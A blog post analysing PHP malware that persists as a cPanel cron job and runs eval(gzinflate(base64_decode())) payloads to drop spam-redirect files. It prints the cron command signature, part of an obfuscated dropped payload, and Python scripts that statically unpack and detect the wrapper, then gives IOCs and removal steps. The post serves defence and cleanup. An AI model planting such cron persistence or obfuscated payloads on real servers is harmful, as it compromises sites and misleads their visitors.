DEV Community

MD Pabel

Posted on • Originally published at mdpabel.com on

PHP Cron Job Malware

Technical Analysis

The malware was persisted as a cPanel cron job. At each scheduled run it invoked the PHP CLI with an inline script that wrapped the payload in 'eval(gzinflate(base64_decode(...)))', so the real code only existed in memory after being base64-decoded and inflated. The executed code wrote malicious files into the web root, which redirected visitors to spam sites. Because the cron job, not the dropped files, was the root cause, deleting the files alone did not help: the next scheduled run regenerated the payload.

VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.

Attack Chain

  1. A cron job executes a PHP script at scheduled intervals.
  2. The PHP script uses 'eval(gzinflate(base64_decode()))' to decode and execute hidden malicious code.
  3. The executed code generates malicious files, redirecting the site to spam URLs.
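The cron command above is only the outermost layer; the code that actually drops files is the output of gzinflate(). The following script is an added example, not code from the original post: it reproduces PHP's gzinflate() with raw-DEFLATE decompression in Python and peels eval(gzinflate(base64_decode())) layers statically, never executing any PHP. The inner payload and the cron command it is wrapped in are constructed here for demonstration (a harmless file_put_contents stand-in rather than a real dropper).

```python
"""Statically unpack PHP eval(gzinflate(base64_decode("..."))) layers.

Added example, not from the original post. Nothing here runs PHP: gzinflate()
is reproduced with zlib raw-DEFLATE decompression, and layers are peeled until
no eval() wrapper remains. The sample payload is constructed below.
"""
import base64
import re
import zlib
from typing import Tuple

# Matches the wrapper seen in cron-command.bash. The blob may be single- or
# double-quoted and may contain line breaks.
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]"
    r"([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)",
    re.S,
)


def php_gzdeflate(data: bytes) -> bytes:
    """Equivalent of PHP gzdeflate(): raw DEFLATE stream without zlib header."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def php_gzinflate(data: bytes) -> bytes:
    """Equivalent of PHP gzinflate(): inflate a raw DEFLATE stream."""
    return zlib.decompress(data, -15)


def wrap_eval(php_source: bytes) -> str:
    """Build one eval(gzinflate(base64_decode())) layer around PHP source.
    Used only to construct test input that looks like the real wrapper."""
    blob = base64.b64encode(php_gzdeflate(php_source)).decode()
    return 'eval(gzinflate(base64_decode("%s")));' % blob


def unpack(code: str, max_layers: int = 10) -> Tuple[str, int]:
    """Peel eval(gzinflate(base64_decode())) layers without executing anything.
    Returns (innermost_code, layers_removed)."""
    layers = 0
    while layers < max_layers:
        m = WRAPPER.search(code)
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group(1))  # tolerate wrapped base64
        try:
            inner = php_gzinflate(base64.b64decode(blob, validate=True))
        except (ValueError, zlib.error) as exc:
            raise ValueError(f"layer {layers + 1}: cannot decode blob: {exc}")
        code = inner.decode("utf-8", errors="replace")
        layers += 1
    return code, layers


# Constructed sample: a harmless stand-in for the dropper body, wrapped twice
# the way the cron-job payload was. A real sample carries the file-writing
# dropper here; this one is never executed either way.
INNER_PHP = b'file_put_contents("/tmp/demo.txt", "hello");'
SAMPLE_CRON_COMMAND = (
    "/usr/local/bin/php -r '" + wrap_eval(wrap_eval(INNER_PHP).encode()) + "'"
)

if __name__ == "__main__":
    decoded, n = unpack(SAMPLE_CRON_COMMAND)
    print(f"peeled {n} layer(s):\n{decoded}")
```

To use it on a real cron entry, paste the command string into unpack() instead of SAMPLE_CRON_COMMAND; the decoded text is what eval() would have run, and it can be read and grepped for the paths it writes to without ever touching the PHP interpreter.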

Code Signature(s)

FILE: cron-command.bash

/usr/local/bin/php -r 'eval(gzinflate(base64_decode("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")));'


FILE: sample.txt

<?php
$wp_link_pages_yb = array ('7X15W9tI8vD/+RTCkx3Z','gzG2gUyCMTkIJOSAhCMn','WT+yDltYF5KMbTL57m9V','d0vqllq2IZnZ/T3vMkOw','u6urq6ur7zru3Q/GkTEx','tYE/ti+VrlLZsB5t9R+0','Hhlmf6NpPdT1pv7nVktr','P9AfmQ+a7YePTOths918','YPSbza12X3vYapkb7Xbr','oaWbD/Wth5XOvfuBHXqa','bluDPmL8zbC2MLXvGr42','hRT1wHbM6K3mqZB6Y9x4','9lUczAZ+DHlxODYhdTod','etGNjsDnZwdrDxHSG400','+3I4G44x3TW2qvd7p/sn','H/ZPvqovz87e9c7hW+/p','i/2jM/VbrXPvnm0pVdMN','4hkAvjs+Pfuqzvqm6VxC','bk35fk+Bn3wGIE7q7tz7','QVGs2FFkxoBj7/j49eH+','V0nNLwEJYFUaSkWLPdd3','KlkVk+GVPbxxr6fVpQrW','Fb6htYyKpCXlTU4bNQ6d','mekY8diJxtAiLQy1WbXy','wvcHjgkVVE6dcRjgh7en','R8/8GD/ZWk8L9aF9bYb4','9bPmGeYUP51obt+BRKAE','cSMpQWgOeq4W68Oquq4C','7bYbOL5hVtW/1LpYO7ZM','XbcxeQnC8WdoaoYZVgnU','eqvRVDabm8oRyMaBP/YM','lZGBP+bUjum3H4Wuor3q','muMRhx4hRAB/Nhlo0xwF','+UzgoK373nW1Mo6ttYfY','QzmpqSuhNw36Y72AGGFv','KTZJk+QUO/ogHJYQzPLu','Qi8r+svJDXzDvTFK6E0y','70JwUvaXUxzH3k14VUJx','knkXipOyv14kAtcZlYkE','zbuTSNCiP0EuDMp71tjT','Y9v3MvRaFF9Px4D2cnLj','TD1zqKfzVpoC9Pa1yHyw','2TM9HWcWDphiZ2gyQMOk','gDQ9gXJszXIuh+PxDa5E','FZaqD/qX2pVhjvvDSz79','KjY1PbyJr0cOwjc7bAKH','5Uqpirk7ShSHjumlFfLc','t/wQ4N3YDa/C2cQmqBTu','e1aYaxYHsLrKYys2RB+G','VT80krq/CqRBb/xbIbkp','8q8Z6rR7UswCMxpdvqoc','JF/L6qqYiWIpcmi3O49F','yU8/NLWRiOrHPfETiBH+','Cc14HHr57uapp4vlE9uz','ezg+VDMM/bDn+ANYfryx','40B+lgnJPQIQQW5TyHK1','ac+cmvoYBbcX266ZgEA2','+d5zbNeOq81klwGrZoSw','uu8GWmhW371814NBcnp4','fFRX1K3GRqMJKNQdNeUB','QeVqA1vvXY392Ix64dhD','1AQpjpzFeP9sbBbwYqlB','HvUg0KsEIpPQZFjqmjt1','h9dTrXp/6gwnAyPM9xLj','ux316D4ig3tMdxZQV1BV','U0S41qcg2ygDdhA5WjQ0','o6xsh+vj3KSF8p0RRZI4','8GQyykHRRH7mSVt4M5n1','+wO7X00aZthmtbIDY9RV','XDMe+kY38KN4d8f2gnGs','xLPA7AZaFE1gDCme5tJv','QnY07kP3K9eaMza76u6u','uruzjvh2K7Tv0rqzvd/9','a8sKL2277wbAn6vAvjYm','s5l2lW1E2STLAZLdaAZK','Gwdyo/v+CNpQirKwZ+T3','+HN2Q9hOnMx//12pDqHD','quoAGKNmi0UC0AW6pDiX','3e/Wc+U7/EC/3Z4byPnr','L2UpSGVlHt2ZnPDrFxID','Ihz7jj+BbSn0PHwj4/D4','FCaFurJRI/yoTGyvknam','dROORtF4HM7G5MADmXCC','+aGYTmSWwXj2VKUj/354','aQ3jqytIJZPSACelSLPM','ngtzHm6BCY


Indicators of Compromise (IOCs)

  • A cron job invoking the PHP CLI with inline code: /usr/local/bin/php -r 'eval(
  • The obfuscation chain gzinflate(base64_decode( inside a cron command or a PHP file
  • Dropped files such as sample.txt that declare an array of base64 chunks in a WordPress-looking variable (here $wp_link_pages_yb)
  • Visitors being redirected to spam sites

Removal Protocol

  1. Access the cPanel account and open the Cron Jobs section. The same entries are visible from a terminal with crontab -l, which is the quicker place to grep for eval.
  2. Locate and delete the cron job that runs the PHP script; do this before cleaning files, otherwise the next scheduled run recreates them.
  3. Search the website's directories for the generated files (look for the gzinflate(base64_decode( chain and for files like sample.txt) and remove them.
  4. Scan the site for any remaining backdoors and fix the entry point that allowed the cron job to be created, or the infection will return.
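Steps 2 and 3 come down to two searches: the crontab for the cron-command signature, and the document root for files carrying the same eval chain. The script below is an added example, not part of the original post, that performs both over constructed input. The sample crontab text and the temporary directory tree are built inside the script; on a real host, pass the output of crontab -l and the path of the document root instead.

```python
"""Triage helpers for the removal steps: flag suspicious crontab entries and
locate PHP files carrying the eval/gzinflate/base64 wrapper.

Added example, not from the original post. The crontab text and directory
tree are constructed here; feed it `crontab -l` output and a real web root.
"""
import os
import re
import tempfile
from typing import List, Tuple

# Signatures taken from the IOCs: PHP CLI run with -r and an inline eval, and
# the obfuscation chain itself (also catches eval(base64_decode( variants).
CRON_SIG = re.compile(r"php\S*\s+-r\s+['\"]?\s*eval\s*\(", re.I)
CHAIN_SIG = re.compile(
    r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)?\s*\(?\s*base64_decode\s*\(",
    re.I,
)


def suspicious_cron_entries(crontab_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, line) for crontab entries matching either signature."""
    hits = []
    for n, line in enumerate(crontab_text.splitlines(), start=1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if CRON_SIG.search(line) or CHAIN_SIG.search(line):
            hits.append((n, line))
    return hits


def scan_tree(root: str, exts=(".php", ".phtml", ".inc", ".txt")) -> List[str]:
    """Walk root and return files whose content contains the obfuscation chain.
    .txt is included because the dropper in this case wrote sample.txt."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(1 << 20)  # the wrapper sits near the top
            except OSError:
                continue
            if CHAIN_SIG.search(head.decode("latin-1")):
                found.append(path)
    return sorted(found)


# Constructed sample crontab: one legitimate backup job and one entry shaped
# like cron-command.bash (blob shortened; not a real payload).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/tar czf /home/user/backup.tgz /home/user/public_html
*/15 * * * * /usr/local/bin/php -r 'eval(gzinflate(base64_decode("7X15W9tI8vD")));'
"""


def build_sample_tree() -> str:
    """Create a temporary document root with one clean file and one dropped file."""
    root = tempfile.mkdtemp(prefix="triage-")
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'clean';\n")
    with open(os.path.join(root, "wp-content", "uploads", "sample.txt"), "w") as fh:
        fh.write('<?php eval(gzinflate(base64_decode("7X15W9tI8vD")));\n')
    return root


if __name__ == "__main__":
    for n, line in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"crontab line {n}: {line}")
    for path in scan_tree(build_sample_tree()):
        print("dropped file:", path)
```

Run it first with the cron job still in place to record the exact command (the blob is the evidence of what was dropped), then delete the entry and re-run scan_tree() after cleanup to confirm nothing regenerated. The extension list is deliberately broad; a match in a .txt file is not executable by itself but, as this case shows, is what the cron job materialises on disk.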

Status: Active Threat.

Verification: Verified by MD Pabel.
